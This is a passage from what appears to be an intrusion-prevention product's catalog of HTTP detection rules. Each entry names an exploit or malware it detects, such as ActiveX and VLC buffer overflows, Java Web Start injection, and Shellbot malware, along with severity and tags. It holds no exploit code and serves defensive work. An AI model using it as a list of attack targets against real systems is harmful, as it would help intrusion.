Tags: Windows, Any Hardware, RealPlayer, RealPlayer SP, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-383-4219
Vulnerability: RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Red-Hat-Binary-Installation-Package-Download

About this situation: Detected a download attempt of an executable content
Context: HTTP Server Stream
Severity: 2
Tags: SUSE Linux, Fedora Linux, Red Hat Linux, Mandrake Linux, Any Hardware, SUSE Linux not specific, Red Hat Linux not specific, Mandrake Linux not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-188-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Red-Hat-Installation-Package
Description:
Back to top

HTTP_SS-Reference-To-Ie-Rendering-Engine

About this situation: Word Document containing reference to mshtml.dll
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-208-2032
Vulnerability: HTTP-Word-Doc-Using-Ie
Description:
Back to top

HTTP_SS-RIFF-WAVE-Download

About this situation: Detected a download of WAVE audio file
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-451-4333
Vulnerability: File-Type-Identification
Description:
Back to top

HTTP_SS-Rst-Malware

About this situation: Rst malware detected
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Rst-Malware
Description:
Back to top

HTTP_SS-Same-Origin-Policy-Bypass

About this situation: An attempt to exploit a cross-site scripting vulnerability in multiple browsers detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, MS2002, CVE2002, Any Operating System not specific, Generic browser not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-181-2032
Vulnerability: Internet-Explorer-Same-Origin-Policy-Bypass
Konqueror-Same-Origin-Policy-Bypass
Description:
Back to top

HTTP_SS-SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP AG GUI for Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-254-3038
Vulnerability: HTTP_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution

About this situation: An attempt to exploit a vulnerability in SAP GUI detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-297-4219
Vulnerability: SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution
Description:
Back to top

HTTP_SS-SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
Description:
Back to top

HTTP_SS-SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit

About this situation: An exploit against a file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, SAP GUI, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-256-3038
Vulnerability: SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
Description:
Back to top

HTTP_SS-Shellbot-Malware

About this situation: Shellbot malware detected
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Shellbot-Perl-Malware
Description:
Back to top

HTTP_SS-SHOUTcast-Stream-Usage

About this situation: Detects SHOUTcast stream usage
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-218-3038
Vulnerability: SHOUTcast-Stream-Usage
Description:
Back to top

HTTP_SS-SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Skype detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Skype, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
Description:
Back to top

HTTP_SS-SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control

About this situation: An attempt to exploit a vulnerability in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX Control detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall SSL-VPN, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control
Description:
Back to top

HTTP_SS-SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF

About this situation: Detected an attempt to exploit buffer overflow vulnerability in SonicWall SSL-VPN NetExtender
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, SonicWall SSL-VPN NetExtender, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-SSReader-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in SSReader detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, SSReader, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: SSReader-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption

About this situation: Malicious Java applet detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption
Description:
Back to top

HTTP_SS-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow

About this situation: Suspicious XML-based JNLP file detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Start, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-405-4219
Vulnerability: HTTP-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Web Start detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Web Start, Sun Java Development Kit, Sun Java 2 Software Development Kit, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow
Description:
Back to top

HTTP_SS-Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow

About this situation: Attempt to exploit stack buffer overflow vulnerability in Sun Java Web Start detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Start, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow
Description:
Back to top

HTTP_SS-Sun-Java-Web-Start-Launch-Command-Line-Injection

About this situation: An attempt to exploit a command-line injection vulnerability in Sun Java Web Start detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-301-4219
Last changed: sgpkg-ips-342-4219
Vulnerability: Sun-Java-Web-Start-Launch-Command-Line-Injection
Description:
Back to top

HTTP_SS-Sun-Java-WebStart-Jnlp-Buffer-Overflow

About this situation: Crafted JNLP file with an excessively long codebase attribute detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Sun Java Runtime Environment, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Sun-Java-WebStart-Jnlp-Buffer-Overflow
Description:
Back to top

HTTP_SS-Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Web Start detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Web Start, Sun Java Development Kit, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception
Description:
Back to top

HTTP_SS-SupportSoft-Products-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in SupportSoft ActiveX control was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, SupportSoft Products, Symantec Norton AntiVirus, Symantec Norton System Works, Symantec Norton Internet Security, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-98-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_SupportSoft-Products-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Suspicious-Filename-In-Gzip-Compressed-Archive

About this situation: A suspicious filename in gzip compressed archive was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, BitDefender Internet Security, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution
Description:
Back to top

HTTP_SS-Suspicious-Filename-In-Zip-Archive

About this situation: A suspicious filename in zip archive was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, BitDefender Internet Security, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution
Description:
Back to top

HTTP_SS-Symantec-Altiris-Deployment-Solution-ActiveX-File-Download

About this situation: An attempt to exploit a vulnerability in Symantec Altiris Deployment Solution detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Altiris Deployment Solution, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: Symantec-Altiris-Deployment-Solution-ActiveX-File-Download
Description:
Back to top

HTTP_SS-Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Antivirus detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Symantec Client Security, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-288-4219
Vulnerability: Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call

About this situation: Detected an attempt to call a vulnerable method in Symantec AppStream Client
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec AppStream Client, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-720-5211
Vulnerability: Symantec-AppStream-Client-LaunchObj-ActiveX-Control-Multiple-Weaknesses
Description:
Back to top

HTTP_SS-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Symantec Backup Exec for Windows Servers detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Backup Exec for Windows Server, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
Description:
Back to top

HTTP_SS-Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Altiris Deployment Solution detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Altiris Deployment Solution, Symantec Altiris Notification Server, Symantec Management Platform, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow
Description:
Back to top

HTTP_SS-Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Altiris Deployment Solution detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Altiris Deployment Solution, Symantec Altiris Notification Server, Symantec Management Platform, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-381-4219
Vulnerability: Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow
Description:
Back to top

HTTP_SS-Symantec-Norton-AntiVirus-Stack-Exhaustion

About this situation: An attempt to exploit a vulnerability in Symantec Norton AntiVirus detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-357-4219
Vulnerability: Symantec-Norton-AntiVirus-Stack-Exhaustion
Description:
Back to top

HTTP_SS-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution

About this situation: Memory corruption exploit against Symantec NavComUI.dll library detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Symantec Norton System Works, Symantec Norton Internet Security, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-117-2032
Last changed: sgpkg-ips-357-4219
Vulnerability: HTTP-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution
Description:
Back to top

HTTP_SS-Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution

About this situation: Memory corruption exploit against Symantec NavComUI.dll library detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Symantec Norton System Works, Symantec Norton Internet Security, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-357-4219
Vulnerability: HTTP-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution
Description:
Back to top

HTTP_SS-Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt

About this situation: An attempt to exploit a vulnerability in Tom Sawyer GET Extension Factory COM object detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware VI Client, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt
Description:
Back to top

HTTP_SS-Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner

About this situation: An attempt to exploit a vulnerability in Trend Micro Internet Security Pro detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro Internet Security Pro, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner
Description:
Back to top

HTTP_SS-Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Trend Micro OfficeScan Corporate Edition detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Trend Micro OfficeScan Corporate Edition, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Trend Micro OfficeScan objRemoveCtrl ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Trend Micro OfficeScan Corporate Edition, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Tumbleweed SecureTransport detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Tumbleweed SecureTransport, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-uTorrent-Announce-Url-Buffer-Overflow

About this situation: Detects buffer overflow exploits against uTorrent
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, uTorrent, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-249-3038
Vulnerability: uTorrent-Announce-Url-Buffer-Overflow
Description:
Back to top

HTTP_SS-Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow

About this situation: Detected an access to vulnerabile methods of Verisign MKI ConfigChk ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Verisign MPKI, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-BOF

About this situation: Detected attempt to use vulnerable method of VersalSoft HTTP File Upload ActiveX component
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, VersalSoft HTTP File Upload, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption

About this situation: Detected an access to vulnerable methods of VideoLAN VLC ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, VideoLAN VLC, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in VideoLAN VLC Media Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-354-4219
Vulnerability: VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, VideoLAN VLC, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Vulnerability: VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free-Vulnerability
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-383-4219
Vulnerability: VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-229-3038
Vulnerability: VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: VideoLAN-VLV-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-Ty-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Videolan VLC detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: VideoLAN-VLC-Ty-Processing-Buffer-Overflow
Description:
Back to top

HTTP_SS-VideoLAN-VLC-XSPF-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in VideoLAN Project VLC Media Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-234-3038
Vulnerability: VideoLAN-VLC-XSPF-Memory-Corruption
Description:
Back to top

HTTP_SS-Visual-Basic-Script-ShellCode-Generation

About this situation: Suspicious JavaScript code detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
